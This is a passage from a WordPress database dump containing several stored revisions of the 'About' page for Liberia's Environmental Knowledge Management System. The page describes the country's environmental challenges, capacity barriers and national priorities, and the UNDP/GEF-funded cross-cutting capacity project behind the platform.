Strategy Action Plan. The NAPA identifies key adaptation needs and list priority actions, such as enhancing resilience to increasing rainfall variability through agriculture, to address the needs.</p>\n<p>This project is also in line with Liberia’s UNDAF 2013-2017. The UN Country Team decided that the new UNDAF would also take into account the requirements of Delivering as One. Thus, in addition to the Strategic Framework and Results Matrix, the UNDAF is accompanied by a detailed Costed Action Plan. Together they constitute the One Programme. The four pillars of the One UN Programme are:</p>\n<ul>\n<li>Peace, Security, Rule of Law</li>\n<li>Sustainable Economic Transformation</li>\n<li>Human Development</li>\n<li>Inclusive Governance and Public Institutions</li>\n</ul>\n<p>The UNDAF (One Programme) also aligns with Liberia’s National medium-term strategy, known as the Agenda for Transformation. The Agenda for Transformation is based on five pillars:</p>\n<ul>\n<li>Peace, Security and Rule of Law</li>\n<li>Economic Transformation</li>\n<li>Human Development</li>\n<li>Governance and Public Institutions</li>\n<li>Cross-cutting issues</li>\n</ul>\n<p>The Agenda contains a specific goal to improve management of the environment to safeguard sustained economic development and growth. Specific actions called for in this agenda include: a) developing environmental quality standards and regulatory tools; b) harmonizing environmental laws and policies to ensure improved environmental management; c) undertake a gap analysis of sectoral environmental laws and policies; d) create environmental awareness; e) create training and education programmes; f) develop a public awareness strategy and campaign; g) train professionals in effective environmental management; strengthen environmental units in ministries through training and improved coordination; and h) develop a system to collect and disseminate environmental information/data.</p>\n<p>The design and implementation of the proposed CCCD project would also take into account the development plans of other bilateral and multilateral donors in Liberia to ensure appropriate alignment as well as to leverage the necessary co-financing.</p>\n<h4>A.4 Baseline Scenario and Associated Baseline Projects</h4>\n<p>Liberia is struggling to fulfill many of the objectives set forth in the Rio Conventions. Many of the developed frameworks and plans for action face limited implementation due to limited government resources, limited human capacity, and a lack of appropriate technologies. Liberia struggles with an inadequate system for information and knowledge management and the poor information sharing between or within sectors. Additionally, the country’s degraded and limited infrastructure combined with a low technical and institutional capacity severely limit Liberia’s environmental governance framework and thus its potential to conserve the natural environment, let alone secure long-term benefits from it. The civil war only exacerbated the situation, leading to displacement of individuals and unprecedented amounts of resource exploitation. Although Liberia is recovering from the war, 85% of the population still lives below the international poverty line. Liberia’s HDI (2014) is 0.430, ranking the country 177 out of 188 (UNDP, 2015). </p>\n<p>Multilateral donor agencies specifically in the field of natural resource management currently working in Liberia now include the African Development Bank, GEF, IFAD, UNDP, and the World Bank. Bilateral donor agencies are also very important development partners from, Norway, and the United States (USAID), as well as other inter-governmental organizations such as the CARE International, Conservation International, and the Society for the Conservation of Nature in Liberia. </p>\n<p>National environmental NGOs, with assistance from Conservation International, organized themselves into the Alliance for Conservation in Liberia. The goal of this body is to ensure that all local NGOs who are or would like to be involved in conservation of biodiversity can do so without overlapping efforts or functions. </p>\n<p>Liberia has made significant progress since the end of the civil war by investing in infrastructure, revising existing policies and laws, and reviewing the mandates of political institutions to reduce duplication. One area of progress is updating the mandates and restructuring Government ministries and agencies to improve effectiveness and efficiency. Liberia has also established new agencies like the Rural and Renewable Energy Agency to promote the sustainable development strategy. Reforms in Liberia have been undertaken on an institution-by-institution basis and have not been considered on a holistic basis, nor have they increased coordination and harmonization. </p>\n<p>Between 2010 and 2012, UNEP implemented a global project, entitled Piloting Integrated Processes and Approaches to Facilitate National Reporting to Rio Conventions that included Liberia as a beneficiary country. This project focused on helping Liberia (among other countries) to better organize modalities for accessing and preparing their national reports. Notwithstanding the capacities developed, a number of important capacities remained to be developed, such as the standardization of data collection and information analysis, improved coordination and collaboration to facilitate streamlined national reporting, and increased awareness and stakeholder engagement in the national reporting process. During the project implementation, activities under component 4 will undertake an updated assessment of the systemic, institutional, and individual capacities that remain a priority to be developed in order to meet and sustain Rio Convention obligations.</p><p>A description of on-going projects that this project will coordinate with appears in section C.4 Partnerships.  Relevant completed UNDP GEF projects that form the baseline of this project include:</p>		\n			<h2>What does the EKMS include?</h2>		\n		<!-- wp:paragraph -->\n<p>The Environmental Knowledge Management System (EKMS) is an integrated online knowledge platform which strive to draw on and complement a growing agenda on the Rio Conventions within the Natural Resource Management Sector and external partners to scale up environmental initiatives.</p>\n<!-- /wp:paragraph -->\n<!-- wp:paragraph -->\n<p>The EKMS provides free and open access to information from key government and other institutions in Liberia relating to the implementation of the Rio Conventions – The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. The EKMS is deployed under the supervision of Environmental Protection Agency (EPA) in collaboration with twelve relevant government institutions. Information access on this platform include reports, publications, case studies, tools and guidelines, institution’s technical documents, and other related materials.</p>\n<!-- /wp:paragraph -->\n<!-- wp:paragraph -->\n<p>Additionally, the EKMS provides a platform for government institutions and other contributors to share latest blogs, news and stories related to the Rio Conventions implementation process.</p>\n<!-- /wp:paragraph -->		\n			<h2>Acknowledgement</h2>		\n		<p>The EPA gratefully acknowledges financial support from the United Nations Development Programme (UNDP) - the Global Environmental Facility (GEF) for the development of this Environmental Knowledge Management System (EKMS).</p>		\n			<h2>Disclaimer</h2>		\n		<p>The Environmental Knowledge Management System (EKMS) provides free and open access to important information from key government and other institutions in Liberia on implementation of the Rio Conventions. The information in the EKMS is provided for informational and educational purposes only. This website contents can not be taken to reflect the views of its sponsors.</p>','About','','inherit','closed','closed','','68-revision-v1','','','2019-11-12 12:09:34','2019-11-12 12:09:34','',68,'https://ekmsliberia.info/68-revision-v1/',0,'revision','',0),(1962,1,'2019-11-12 12:25:30','2019-11-12 12:25:30','<h2>About the EKMS</h2>		\n			<h2>Why was the EKMS created?</h2>		\n		<p>In an effort to bridge knowledge management gaps, the EKMS was created to strengthen institutional coordination between the Environmental Protection Agency (EPA) and other Liberia government institutions as well as Nongovernmental Organizations that have direct linkages with environmental policies and development. It was also created to increase access and dissemination of key information and promote adequate public awareness and education.</p>\n<p>The EKMS is an output of the Cross-Cutting Capacity Development Project (CCCD). The project funded by the GEF and implemented by the EPA in partnership with the UNDP in collaboration with Natural Resources Management Agencies of Liberia. The project is in line with GEF-6 CCCD Strategy objective 1, 3, and 5 which call for countries to: a) integrate global environmental needs into management information systems and monitoring, b) integrate MEA provisions into national policy, legislative, and regulatory frameworks, and c) update NCSAs, respectively.</p>\n<h3>Development Challenge</h3>\n<h4>A1. Global Environmental Challenges</h4>\n<p>Liberia is located on the southwest coast of Africa, and boarders the Ivory Coast, Guinea, and Sierra Leone. Liberia is divided into 15 counties, which are subdivided into 90 districts. Although Liberia is a rather small country, it has significant biodiversity. There are 600 bird species, 150 mammals, 75 reptiles and over 2000 flowering plants. Some notable species in Liberia include western chimpanzees, forest elephants, and leopards. Liberia also has rich forests; around 42% of the Upper Guinea Forest of West Africa is contained within Liberia (Republic of Liberia, 2014; Republic of Liberia, 2004). Liberia also has numerous natural resources such as timber, rubber, gold diamonds, and iron ore. Economically, the forestry and agriculture sectors are two of the most important sectors in Liberia. Agriculture accounts for over 70% of livelihoods (Dorliae, 2012).</p>\n<p>Liberia faces numerous environmental challenges including land degradation, fragmentation, deforestation, soil erosion, and pollution. The dependence on forestry presents a unique environmental risk as Liberia’s forest is part of the West African Hotspot. This (once) rich ecosystem has faced severe deforestation; only ten percent of the original forest remains, of which around 40% lies in Liberia. Unfortunately, this remaining forest is at risk serious risk of deforestation. Over the past two centuries, Liberia has lost over 60% of its forest cover (Republic of Liberia, 2004), and deforestation rates have increased since 2000. Increases in deforestation and land degradation are largely due to displaced people clearing land. Also contributing to deforestation, biodiversity loss, and land degradation is unsustainable farming practices, mining, charcoal production, invasive species, hunting, and unregulated timber extraction. Poaching is also rampant and mitigation measures are lacking; the draft Wildlife Management and Protected Areas Act remains in draft form (Dorliae, 2012).</p>\n<p>Climate change also poses a real threat to Liberia. Among other threats, Liberia’s economy and human health could be threatened by rising temperatures and water scarcity. Currently, the country does not have strong capacities for mitigation and adaptation; Liberia has no institutions that offer climate change education or research programs (although, the University of Liberia does offer programs on the environment). Additionally, there are no organized or coordinated programs for meteorological, hydrological, or climate research and observation. Currently, only fragmented services are available. Along with a lack of observation networks, government bodies are hindered by inadequately-trained staff (Environmental Protection Agency of Liberia, 2013).</p>\n<p>Although aware of the environmental situation, Liberia has struggled to address these environmental issues. The civil wars, which lasted for more than 10 years, served to exacerbate the situation. Poverty also presents a serious challenge; causing degradation and drawing attention and resources from environmental concerns. Over 60% of Liberians live in poverty. Of these, over 40% of citizens live in extreme poverty (Dorliae, 2012). The outbreak of Ebola in 2014 also threatened Liberia’s progress, as the crisis became a priority for the government and stretched already limited resources. Fortunately in January 2016 the outbreak was declared resolved. Overall, there has been slow progress in sustainable development and meeting obligations under the Rio Conventions.</p>\n<h4>Root Causes</h4>\n<p>There are a few key root causes of environmental degradation in Liberia. The most critical include: human settlements and population pressures; shifting cultivation; timber exploitation; and rubber plantations. More generally, root causes are related to over-exploitation of biological resources; poverty; political instability and wars; education; and inadequate law enforcement (Republic of Liberia, 2004). From a reporting perspective, one root cause of Liberia’s development challenges is the fact that Focal Points are located in different agencies, which thereby limits coordination and collaboration between them.</p>\n<h4>A2. Capacity Barriers</h4>\n<p>Liberia has undertaken numerous initiatives to address environmental issues. Despite the achievements Liberia made, Liberia continues to face important challenges to meeting environmental goals. As a Rio Convention mainstreaming project, the proposed strategy sets out to meet barriers identified in Liberia’s 2006 National Capacity Self-Assessment (NCSA), which was undertaken though a consultative process and participatory approach that involved numerous stakeholders from various sectors. Through the inclusive and consultative process of the NCSA, stakeholders identified a number of areas that explain the difficulty in fulfilling the obligations of the Rio Conventions. The NCSA identified the following barriers that cut across the three Rio Conventions:</p>\n<ul>\n<li style=\"list-style-type: none\">\n<ul>\n<li style=\"list-style-type: none;\">\n<ul>\n<li>Inadequate public awareness and education/training</li>\n<li>Inadequate institutions and institutional frameworks</li>\n<li>Inadequate political commitment</li>\n<li>Inadequate planning skills and resources, as well as incomplete structures at all levels of policy implementation</li>\n<li>Inadequate financial resources and economic framework</li>\n<li>Inadequate strategic plans and implementation</li>\n<li>Inadequate access to information</li>\n<li>Inadequate policies and legal frameworks</li>\n<li>Low level of involvement of civil society</li>\n<li>Inadequate natural resources management systems</li>\n<li>Lack of institutional capacities</li>\n<li>Lack of effective mechanism for information processing and sharing</li>\n<li>\n<p>Poor governance</p>\n</li>\n</ul>\n</li>\n</ul>\n</li>\n</ul><p>Liberia’s Agenda for Transformation 2012-2017 confirmed many of the barriers identified in the NCSA. Specifically, the agenda noted the following barriers:</p>\n<ul>\n<li>Weak technical, administrative and managerial capacities;</li>\n<li>Weak institutional coordination;</li>\n<li>Unclear policies and mechanisms to enable effective participation by especially non-state actors; at the national and local levels;</li>\n<li>Limited stakeholder participation in planning and decision-making processes;</li>\n<li>Limited dissemination of key information (Republic of Liberia, 2013).</li>\n</ul>\n<p>Barriers were also reaffirmed in the Liberia Constraints Analysis (Government of Liberia, 2013).</p>\n<h4>A.3 Consistency with National Priorities</h4>\n<p>The country has demonstrated a desire to improve the environmental policy framework with the preparation of multiple new policies including the National Environmental Protection and Management Law (2003), the National Environmental Policy (2003), the establishment of an Environmental Protection Agency, in 2003, the National Forestry Law (2000), and the New Mineral and Mining Laws (2000).</p>\n<p>In the first Poverty Reduction Strategy, the environment was considered a cross-cutting issue. Some achievements made during implementation of this strategy include passage of the Community Rights Law, which established a system for community harvesting of forests. Efforts were also undertaken to improve protected areas management and increase the size/number of protected areas. In Liberia’s medium-term Poverty Reduction Strategy II (2012-2018) there is a fifth pillar: Cross-Cutting Issues which includes the environment. Additionally, environmental issues have been integrated into other pillars of the strategy specifically the economic pillar.</p>\n<p>During the Liberia Rio +20 National Consultative Workshop, Liberia identified five issues that are essential for accomplishing its development goals and objectives. Additionally, Liberia has also developed a National Capacity Development Strategy (2010), which calls for investing in areas needed to achieve development goals.</p>\n<p>The project will assist the Government of Liberia to achieve the national priorities it has set in Liberia RISING 2030. The aim of this is to transform Liberia through a new development strategy, which was launched in December 2012. The overall objective is to turn Liberia into a middle income country by 2030.</p>\n<p>The project is also in line with Liberia’s National Biodiversity Strategy and Action Plan II (NBSAP) which aims to, as part of Liberia’s commitment to the Millennium Development Goals, and in line with the National Environmental Policy of Liberia, assist the people of Liberia to acknowledge and exercise responsible stewardship over biological resources to meet the needs of the present without endangering the ability of future generations to meet their own needs. Some of the goals are to protect critical ecosystems, create biodiversity awareness, and increase commitment to sustainable use of biological diversity (Republic of Liberia, 2017).</p>\n<p>Liberia’s 2008 National Adaptation Plan of Action (NAPA), as a response to the impacts of climate change, aligns with National Environmental Policy which calls for the sustainable management of Liberia’s environment and natural resources. The NAPA also aims to establish synergies between adaptation and national development plans, such as the National Reconstruction and Development Plan, Millennium Development Goals, and the National Biodiversity and Strategy Action Plan. The NAPA identifies key adaptation needs and list priority actions, such as enhancing resilience to increasing rainfall variability through agriculture, to address the needs.</p>\n<p>This project is also in line with Liberia’s UNDAF 2013-2017. The UN Country Team decided that the new UNDAF would also take into account the requirements of Delivering as One. Thus, in addition to the Strategic Framework and Results Matrix, the UNDAF is accompanied by a detailed Costed Action Plan. Together they constitute the One Programme. The four pillars of the One UN Programme are:</p>\n<ul>\n<li>Peace, Security, Rule of Law</li>\n<li>Sustainable Economic Transformation</li>\n<li>Human Development</li>\n<li>Inclusive Governance and Public Institutions</li>\n</ul>\n<p>The UNDAF (One Programme) also aligns with Liberia’s National medium-term strategy, known as the Agenda for Transformation. The Agenda for Transformation is based on five pillars:</p>\n<ul>\n<li>Peace, Security and Rule of Law</li>\n<li>Economic Transformation</li>\n<li>Human Development</li>\n<li>Governance and Public Institutions</li>\n<li>Cross-cutting issues</li>\n</ul>\n<p>The Agenda contains a specific goal to improve management of the environment to safeguard sustained economic development and growth. Specific actions called for in this agenda include: a) developing environmental quality standards and regulatory tools; b) harmonizing environmental laws and policies to ensure improved environmental management; c) undertake a gap analysis of sectoral environmental laws and policies; d) create environmental awareness; e) create training and education programmes; f) develop a public awareness strategy and campaign; g) train professionals in effective environmental management; strengthen environmental units in ministries through training and improved coordination; and h) develop a system to collect and disseminate environmental information/data.</p>\n<p>The design and implementation of the proposed CCCD project would also take into account the development plans of other bilateral and multilateral donors in Liberia to ensure appropriate alignment as well as to leverage the necessary co-financing.</p>\n<h4>A.4 Baseline Scenario and Associated Baseline Projects</h4>\n<p>Liberia is struggling to fulfill many of the objectives set forth in the Rio Conventions. Many of the developed frameworks and plans for action face limited implementation due to limited government resources, limited human capacity, and a lack of appropriate technologies. Liberia struggles with an inadequate system for information and knowledge management and the poor information sharing between or within sectors. Additionally, the country’s degraded and limited infrastructure combined with a low technical and institutional capacity severely limit Liberia’s environmental governance framework and thus its potential to conserve the natural environment, let alone secure long-term benefits from it. The civil war only exacerbated the situation, leading to displacement of individuals and unprecedented amounts of resource exploitation. Although Liberia is recovering from the war, 85% of the population still lives below the international poverty line. Liberia’s HDI (2014) is 0.430, ranking the country 177 out of 188 (UNDP, 2015). </p>\n<p>Multilateral donor agencies specifically in the field of natural resource management currently working in Liberia now include the African Development Bank, GEF, IFAD, UNDP, and the World Bank. Bilateral donor agencies are also very important development partners from, Norway, and the United States (USAID), as well as other inter-governmental organizations such as the CARE International, Conservation International, and the Society for the Conservation of Nature in Liberia. </p>\n<p>National environmental NGOs, with assistance from Conservation International, organized themselves into the Alliance for Conservation in Liberia. The goal of this body is to ensure that all local NGOs who are or would like to be involved in conservation of biodiversity can do so without overlapping efforts or functions. </p>\n<p>Liberia has made significant progress since the end of the civil war by investing in infrastructure, revising existing policies and laws, and reviewing the mandates of political institutions to reduce duplication. One area of progress is updating the mandates and restructuring Government ministries and agencies to improve effectiveness and efficiency. Liberia has also established new agencies like the Rural and Renewable Energy Agency to promote the sustainable development strategy. Reforms in Liberia have been undertaken on an institution-by-institution basis and have not been considered on a holistic basis, nor have they increased coordination and harmonization. </p>\n<p>Between 2010 and 2012, UNEP implemented a global project, entitled Piloting Integrated Processes and Approaches to Facilitate National Reporting to Rio Conventions that included Liberia as a beneficiary country. This project focused on helping Liberia (among other countries) to better organize modalities for accessing and preparing their national reports. Notwithstanding the capacities developed, a number of important capacities remained to be developed, such as the standardization of data collection and information analysis, improved coordination and collaboration to facilitate streamlined national reporting, and increased awareness and stakeholder engagement in the national reporting process. During the project implementation, activities under component 4 will undertake an updated assessment of the systemic, institutional, and individual capacities that remain a priority to be developed in order to meet and sustain Rio Convention obligations.</p><p>A description of on-going projects that this project will coordinate with appears in section C.4 Partnerships.  Relevant completed UNDP GEF projects that form the baseline of this project include:</p>		\n			<h2>What does the EKMS include?</h2>		\n		<!-- wp:paragraph -->\n<p>The Environmental Knowledge Management System (EKMS) is an integrated online knowledge platform which strive to draw on and complement a growing agenda on the Rio Conventions within the Natural Resource Management Sector and external partners to scale up environmental initiatives.</p>\n<!-- /wp:paragraph -->\n<!-- wp:paragraph -->\n<p>The EKMS provides free and open access to information from key government and other institutions in Liberia relating to the implementation of the Rio Conventions – The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. The EKMS is deployed under the supervision of Environmental Protection Agency (EPA) in collaboration with twelve relevant government institutions. Information access on this platform include reports, publications, case studies, tools and guidelines, institution’s technical documents, and other related materials.</p>\n<!-- /wp:paragraph -->\n<!-- wp:paragraph -->\n<p>Additionally, the EKMS provides a platform for government institutions and other contributors to share latest blogs, news and stories related to the Rio Conventions implementation process.</p>\n<!-- /wp:paragraph -->		\n			<h2>Acknowledgement</h2>		\n		<p>The EPA gratefully acknowledges financial support from the United Nations Development Programme (UNDP) - the Global Environmental Facility (GEF) for the development of this Environmental Knowledge Management System (EKMS).</p>		\n			<h2>Disclaimer</h2>		\n		<p>The Environmental Knowledge Management System (EKMS) provides free and open access to important information from key government and other institutions in Liberia on implementation of the Rio Conventions. The information in the EKMS is provided for informational and educational purposes only. This website contents can not be taken to reflect the views of its sponsors.</p>','About','','inherit','closed','closed','','68-revision-v1','','','2019-11-12 12:25:30','2019-11-12 12:25:30','',68,'https://ekmsliberia.info/68-revision-v1/',0,'revision','',0),(1964,1,'2019-11-12 12:40:56','2019-11-12 12:40:56','<h2>About the EKMS</h2>		\n			<h2>Why was the EKMS created?</h2>		\n		<p>In an effort to bridge knowledge management gaps, the EKMS was created to strengthen institutional coordination between the Environmental Protection Agency (EPA) and other Liberia government institutions as well as Nongovernmental Organizations that have direct linkages with environmental policies and development. It was also created to increase access and dissemination of key information and promote adequate public awareness and education.</p>\n<p>The EKMS is an output of the Cross-Cutting Capacity Development Project (CCCD). The project funded by the GEF and implemented by the EPA in partnership with the UNDP in collaboration with Natural Resources Management Agencies of Liberia. The project is in line with GEF-6 CCCD Strategy objective 1, 3, and 5 which call for countries to: a) integrate global environmental needs into management information systems and monitoring, b) integrate MEA provisions into national policy, legislative, and regulatory frameworks, and c) update NCSAs, respectively.</p>\n<h3>Development Challenge</h3>\n<h4>A1. Global Environmental Challenges</h4>\n<p>Liberia is located on the southwest coast of Africa, and boarders the Ivory Coast, Guinea, and Sierra Leone. Liberia is divided into 15 counties, which are subdivided into 90 districts. Although Liberia is a rather small country, it has significant biodiversity. There are 600 bird species, 150 mammals, 75 reptiles and over 2000 flowering plants. Some notable species in Liberia include western chimpanzees, forest elephants, and leopards. Liberia also has rich forests; around 42% of the Upper Guinea Forest of West Africa is contained within Liberia (Republic of Liberia, 2014; Republic of Liberia, 2004). Liberia also has numerous natural resources such as timber, rubber, gold diamonds, and iron ore. Economically, the forestry and agriculture sectors are two of the most important sectors in Liberia. Agriculture accounts for over 70% of livelihoods (Dorliae, 2012).</p>\n<p>Liberia faces numerous environmental challenges including land degradation, fragmentation, deforestation, soil erosion, and pollution. The dependence on forestry presents a unique environmental risk as Liberia’s forest is part of the West African Hotspot. This (once) rich ecosystem has faced severe deforestation; only ten percent of the original forest remains, of which around 40% lies in Liberia. Unfortunately, this remaining forest is at risk serious risk of deforestation. Over the past two centuries, Liberia has lost over 60% of its forest cover (Republic of Liberia, 2004), and deforestation rates have increased since 2000. Increases in deforestation and land degradation are largely due to displaced people clearing land. Also contributing to deforestation, biodiversity loss, and land degradation is unsustainable farming practices, mining, charcoal production, invasive species, hunting, and unregulated timber extraction. Poaching is also rampant and mitigation measures are lacking; the draft Wildlife Management and Protected Areas Act remains in draft form (Dorliae, 2012).</p>\n<p>Climate change also poses a real threat to Liberia. Among other threats, Liberia’s economy and human health could be threatened by rising temperatures and water scarcity. Currently, the country does not have strong capacities for mitigation and adaptation; Liberia has no institutions that offer climate change education or research programs (although, the University of Liberia does offer programs on the environment). Additionally, there are no organized or coordinated programs for meteorological, hydrological, or climate research and observation. Currently, only fragmented services are available. Along with a lack of observation networks, government bodies are hindered by inadequately-trained staff (Environmental Protection Agency of Liberia, 2013).</p>\n<p>Although aware of the environmental situation, Liberia has struggled to address these environmental issues. The civil wars, which lasted for more than 10 years, served to exacerbate the situation. Poverty also presents a serious challenge; causing degradation and drawing attention and resources from environmental concerns. Over 60% of Liberians live in poverty. Of these, over 40% of citizens live in extreme poverty (Dorliae, 2012). The outbreak of Ebola in 2014 also threatened Liberia’s progress, as the crisis became a priority for the government and stretched already limited resources. Fortunately in January 2016 the outbreak was declared resolved. Overall, there has been slow progress in sustainable development and meeting obligations under the Rio Conventions.</p>\n<h4>Root Causes</h4>\n<p>There are a few key root causes of environmental degradation in Liberia. The most critical include: human settlements and population pressures; shifting cultivation; timber exploitation; and rubber plantations. More generally, root causes are related to over-exploitation of biological resources; poverty; political instability and wars; education; and inadequate law enforcement (Republic of Liberia, 2004). From a reporting perspective, one root cause of Liberia’s development challenges is the fact that Focal Points are located in different agencies, which thereby limits coordination and collaboration between them.</p>\n<h4>A2. Capacity Barriers</h4>\n<p>Liberia has undertaken numerous initiatives to address environmental issues. Despite the achievements Liberia made, Liberia continues to face important challenges to meeting environmental goals. As a Rio Convention mainstreaming project, the proposed strategy sets out to meet barriers identified in Liberia’s 2006 National Capacity Self-Assessment (NCSA), which was undertaken though a consultative process and participatory approach that involved numerous stakeholders from various sectors. Through the inclusive and consultative process of the NCSA, stakeholders identified a number of areas that explain the difficulty in fulfilling the obligations of the Rio Conventions. The NCSA identified the following barriers that cut across the three Rio Conventions:</p>\n<ul>\n<li style=\"list-style-type: none\">\n<ul>\n<li style=\"list-style-type: none;\">\n<ul>\n<li>Inadequate public awareness and education/training</li>\n<li>Inadequate institutions and institutional frameworks</li>\n<li>Inadequate political commitment</li>\n<li>Inadequate planning skills and resources, as well as incomplete structures at all levels of policy implementation</li>\n<li>Inadequate financial resources and economic framework</li>\n<li>Inadequate strategic plans and implementation</li>\n<li>Inadequate access to information</li>\n<li>Inadequate policies and legal frameworks</li>\n<li>Low level of involvement of civil society</li>\n<li>Inadequate natural resources management systems</li>\n<li>Lack of institutional capacities</li>\n<li>Lack of effective mechanism for information processing and sharing</li>\n<li>\n<p>Poor governance</p>\n</li>\n</ul>\n</li>\n</ul>\n</li>\n</ul><p>Liberia’s Agenda for Transformation 2012-2017 confirmed many of the barriers identified in the NCSA. Specifically, the agenda noted the following barriers:</p>\n<ul>\n<li>Weak technical, administrative and managerial capacities;</li>\n<li>Weak institutional coordination;</li>\n<li>Unclear policies and mechanisms to enable effective participation by especially non-state actors; at the national and local levels;</li>\n<li>Limited stakeholder participation in planning and decision-making processes;</li>\n<li>Limited dissemination of key information (Republic of Liberia, 2013).</li>\n</ul>\n<p>Barriers were also reaffirmed in the Liberia Constraints Analysis (Government of Liberia, 2013).</p>\n<h4>A.3 Consistency with National Priorities</h4>\n<p>The country has demonstrated a desire to improve the environmental policy framework with the preparation of multiple new policies including the National Environmental Protection and Management Law (2003), the National Environmental Policy (2003), the establishment of an Environmental Protection Agency, in 2003, the National Forestry Law (2000), and the New Mineral and Mining Laws (2000).</p>\n<p>In the first Poverty Reduction Strategy, the environment was considered a cross-cutting issue. Some achievements made during implementation of this strategy include passage of the Community Rights Law, which established a system for community harvesting of forests. Efforts were also undertaken to improve protected areas management and increase the size/number of protected areas. In Liberia’s medium-term Poverty Reduction Strategy II (2012-2018) there is a fifth pillar: Cross-Cutting Issues which includes the environment. Additionally, environmental issues have been integrated into other pillars of the strategy specifically the economic pillar.</p>\n<p>During the Liberia Rio +20 National Consultative Workshop, Liberia identified five issues that are essential for accomplishing its development goals and objectives. Additionally, Liberia has also developed a National Capacity Development Strategy (2010), which calls for investing in areas needed to achieve development goals.</p>\n<p>The project will assist the Government of Liberia to achieve the national priorities it has set in Liberia RISING 2030. The aim of this is to transform Liberia through a new development strategy, which was launched in December 2012. The overall objective is to turn Liberia into a middle income country by 2030.</p>\n<p>The project is also in line with Liberia’s National Biodiversity Strategy and Action Plan II (NBSAP) which aims to, as part of Liberia’s commitment to the Millennium Development Goals, and in line with the National Environmental Policy of Liberia, assist the people of Liberia to acknowledge and exercise responsible stewardship over biological resources to meet the needs of the present without endangering the ability of future generations to meet their own needs. Some of the goals are to protect critical ecosystems, create biodiversity awareness, and increase commitment to sustainable use of biological diversity (Republic of Liberia, 2017).</p>\n<p>Liberia’s 2008 National Adaptation Plan of Action (NAPA), as a response to the impacts of climate change, aligns with National Environmental Policy which calls for the sustainable management of Liberia’s environment and natural resources. The NAPA also aims to establish synergies between adaptation and national development plans, such as the National Reconstruction and Development Plan, Millennium Development Goals, and the National Biodiversity and Strategy Action Plan. The NAPA identifies key adaptation needs and list priority actions, such as enhancing resilience to increasing rainfall variability through agriculture, to address the needs.</p>\n<p>This project is also in line with Liberia’s UNDAF 2013-2017. The UN Country Team decided that the new UNDAF would also take into account the requirements of Delivering as One. Thus, in addition to the Strategic Framework and Results Matrix, the UNDAF is accompanied by a detailed Costed Action Plan. Together they constitute the One Programme. The four pillars of the One UN Programme are:</p>\n<ul>\n<li>Peace, Security, Rule of Law</li>\n<li>Sustainable Economic Transformation</li>\n<li>Human Development</li>\n<li>Inclusive Governance and Public Institutions</li>\n</ul>\n<p>The UNDAF (One Programme) also aligns with Liberia’s National medium-term strategy, known as the Agenda for Transformation. The Agenda for Transformation is based on five pillars:</p>\n<ul>\n<li>Peace, Security and Rule of Law</li>\n<li>Economic Transformation</li>\n<li>Human Development</li>\n<li>Governance and Public Institutions</li>\n<li>Cross-cutting issues</li>\n</ul>\n<p>The Agenda contains a specific goal to improve management of the environment to safeguard sustained economic development and growth. Specific actions called for in this agenda include: a) developing environmental quality standards and regulatory tools; b) harmonizing environmental laws and policies to ensure improved environmental management; c) undertake a gap analysis of sectoral environmental laws and policies; d) create environmental awareness; e) create training and education programmes; f) develop a public awareness strategy and campaign; g) train professionals in effective environmental management; strengthen environmental units in ministries through training and improved coordination; and h) develop a system to collect and disseminate environmental information/data.</p>\n<p>The design and implementation of the proposed CCCD project would also take into account the development plans of other bilateral and multilateral donors in Liberia to ensure appropriate alignment as well as to leverage the necessary co-financing.</p>\n<h4>A.4 Baseline Scenario and Associated Baseline Projects</h4>\n<p>Liberia is struggling to fulfill many of the objectives set forth in the Rio Conventions. Many of the developed frameworks and plans for action face limited implementation due to limited government resources, limited human capacity, and a lack of appropriate technologies. Liberia struggles with an inadequate system for information and knowledge management and the poor information sharing between or within sectors. Additionally, the country’s degraded and limited infrastructure combined with a low technical and institutional capacity severely limit Liberia’s environmental governance framework and thus its potential to conserve the natural environment, let alone secure long-term benefits from it. The civil war only exacerbated the situation, leading to displacement of individuals and unprecedented amounts of resource exploitation. Although Liberia is recovering from the war, 85% of the population still lives below the international poverty line. Liberia’s HDI (2014) is 0.430, ranking the country 177 out of 188 (UNDP, 2015). </p>\n<p>Multilateral donor agencies specifically in the field of natural resource management currently working in Liberia now include the African Development Bank, GEF, IFAD, UNDP, and the World Bank. Bilateral donor agencies are also very important development partners from, Norway, and the United States (USAID), as well as other inter-governmental organizations such as the CARE International, Conservation International, and the Society for the Conservation of Nature in Liberia. </p>\n<p>National environmental NGOs, with assistance from Conservation International, organized themselves into the Alliance for Conservation in Liberia. The goal of this body is to ensure that all local NGOs who are or would like to be involved in conservation of biodiversity can do so without overlapping efforts or functions. </p>\n<p>Liberia has made significant progress since the end of the civil war by investing in infrastructure, revising existing policies and laws, and reviewing the mandates of political institutions to reduce duplication. One area of progress is updating the mandates and restructuring Government ministries and agencies to improve effectiveness and efficiency. Liberia has also established new agencies like the Rural and Renewable Energy Agency to promote the sustainable development strategy. Reforms in Liberia have been undertaken on an institution-by-institution basis and have not been considered on a holistic basis, nor have they increased coordination and harmonization. </p>\n<p>Between 2010 and 2012, UNEP implemented a global project, entitled Piloting Integrated Processes and Approaches to Facilitate National Reporting to Rio Conventions that included Liberia as a beneficiary country. This project focused on helping Liberia (among other countries) to better organize modalities for accessing and preparing their national reports. Notwithstanding the capacities developed, a number of important capacities remained to be developed, such as the standardization of data collection and information analysis, improved coordination and collaboration to facilitate streamlined national reporting, and increased awareness and stakeholder engagement in the national reporting process. During the project implementation, activities under component 4 will undertake an updated assessment of the systemic, institutional, and individual capacities that remain a priority to be developed in order to meet and sustain Rio Convention obligations.</p><p>A description of on-going projects that this project will coordinate with appears in section C.4 Partnerships.  Relevant completed UNDP GEF projects that form the baseline of this project include:</p>		\n			<h2>What does the EKMS include?</h2>		\n		<!-- wp:paragraph -->\n<p>The Environmental Knowledge Management System (EKMS) is an integrated online knowledge platform which strive to draw on and complement a growing agenda on the Rio Conventions within the Natural Resource Management Sector and external partners to scale up environmental initiatives.</p>\n<!-- /wp:paragraph -->\n<!-- wp:paragraph -->\n<p>The EKMS provides free and open access to information from key government and other institutions in Liberia relating to the implementation of the Rio Conventions – The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. The EKMS is deployed under the supervision of Environmental Protection Agency (EPA) in collaboration with twelve relevant government institutions. Information access on this platform include reports, publications, case studies, tools and guidelines, institution’s technical documents, and other related materials.</p>\n<!-- /wp:paragraph -->\n<!-- wp:paragraph -->\n<p>Additionally, the EKMS provides a platform for government institutions and other 